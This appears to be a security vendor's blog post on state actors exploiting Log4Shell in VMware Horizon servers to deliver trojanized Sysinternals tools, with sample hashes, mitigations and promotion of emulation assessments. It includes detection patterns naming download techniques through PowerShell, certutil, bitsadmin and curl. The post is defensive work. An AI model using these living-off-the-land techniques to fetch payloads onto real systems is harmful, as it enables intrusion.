Sectors Targeted: Defense Industrial Base, Financial Services, Education, Hospitality
On 2022 June 23, the Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) released a joint Cybersecurity Advisory (CSA) to alert defenders that state-sponsored advanced persistent threat (APT) actors continue to exploit CVE-2021-44228 (Log4Shell) in unpatched VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access.
Multiple threat actors reportedly began exploiting Log4Shell in December 2021 to deliver trojanized Sysinternals tools that loaded encrypted malware payloads on compromised systems. The report indicates that one of the victims had also been compromised using another VMware vulnerability, CVE-2022-22954, that can result in remote code execution.
Trojanized Sysinternals Tools
To assist customers with protecting their environment from these attacks, AttackIQ has released a new assessment based on the Ingress Tool Transfer (T1105) technique, that reproduces the inbound transfer of the actor’s tools and malware to the customer environment. These scenarios test customer’s network and endpoint security controls designed to prevent the introduction of known malicious files to networks and devices.
This assessment covers the following trojanized samples:
Sample Name | Hash |
Sysinternals Disk Usage Tool | 4a3f79d6821139bc1c3f44fb32e8450ee9705237 |
Sysinternals PsPing Tool | 33638da3a83c2688e1d20862b1de0b242a22e87c |
Sysinternals LogonSessions Tool A | 76f2c5f0312346caf82ed42148e78329f8d7b35a |
Sysinternals LogonSessions Tool B | 6a87d8df99ea58d8612fa58a58b1a3a9512f160e |
Detection Process
It is worth mentioning that at the moment of the US-CERT Alert, it is unclear exactly how the ingress tool transfer was carried out by the threat actors. The malicious Sysinternals tools could be uploaded to the victim machine in two different ways: via exploitation of Log4shell, or by accessing the system after exploitation, and transferring the tools over by using living off the land binaries and scripts.
In the event of an ingress tool transfer via exploitation, then we would recommend leaning on Anti-Virus products to prevent and alert on these malicious Sysinternals tools by adding these binaries to the global blacklist. Additionally, we encourage that VMWare Horizon systems are placed in a policy which acts to quarantine based off static and dynamic analysis.
In the event of an ingress tool transfer using living off the land binaries and scripts, we have provided some detection details that may be used in EDR/SIEM products to alert and/or prevent on the observations of the below examples:
PowerShell Example:
xProcess Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest”) AND “DownloadData” AND “Hidden”)
Certutil Example:
Process Name == Certutil.exe
Command Line Contains (“-urlcache” AND “-f”)
Bitsadmin Example:
Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)
Curl Example:
Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)
Additionally, downloads of file transfer utilities from legitimate sites should be scrutinized to ensure the requests were made by authorized users.
Mitigation Policies
Ensure that VMWare Horizon Systems are patched for log4shell in accordance with VMWare Security Advisories
Additionally, it is recommended that non-administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This can help prevent malicious usage of these tools on end user accounts.
Network Indicators of Compromise
The US-CERT identified multiple IP address indicators of compromise (IOCs) used by the threat actors for their command-and-control infrastructure. A new IOC Replication scenario has been released that will attempt to make web requests directly to the IP addresses identified in both the alert and related malware analysis reports. The infrastructure is no longer actively controlled by the threat actors so the connections should be rejected, however this scenario can be used to validate watchlist and blocklist controls in network appliances by looking for attempted access requests to the indicators.
Log4Shell
When Log4Shell was first discovered, AttackIQ quickly released multiple scenarios and an attack graph that emulated common post-compromise activities from threat actors exploiting that vulnerability. Our blog detailing those scenarios along with recommended defensive actions can be found here.
CVE-2022-22954 VMware Remote Code Execution Vulnerability
AttackIQ has also previously released both atomic and network control validation scenarios for customers to test security controls against the VMware vulnerability that allows for remote code execution. Customers can find those scenarios in the AttackIQ platform by searching for:
- CVE-2022-22954 VMware Workspace ONE Access Template Injection
- PCAP Replay – CVE-2022-22954 VMware Workspace ONE Access Template Injection
The Adversary Research Team at AttackIQ is currently reviewing additional details about the malicious activity reported by US-CERT and will be releasing an advanced attack graph, in the coming days, that will emulate the actor’s post compromise behaviors in a broader kill chain.
In summary, AttackIQ’s new assessment will help organizations test their network and endpoint anti-virus controls against known samples used in real attacks. With data generated from continuous testing and use of this assessment, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.
AttackIQ stands at the ready to help security teams implement this assessment and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.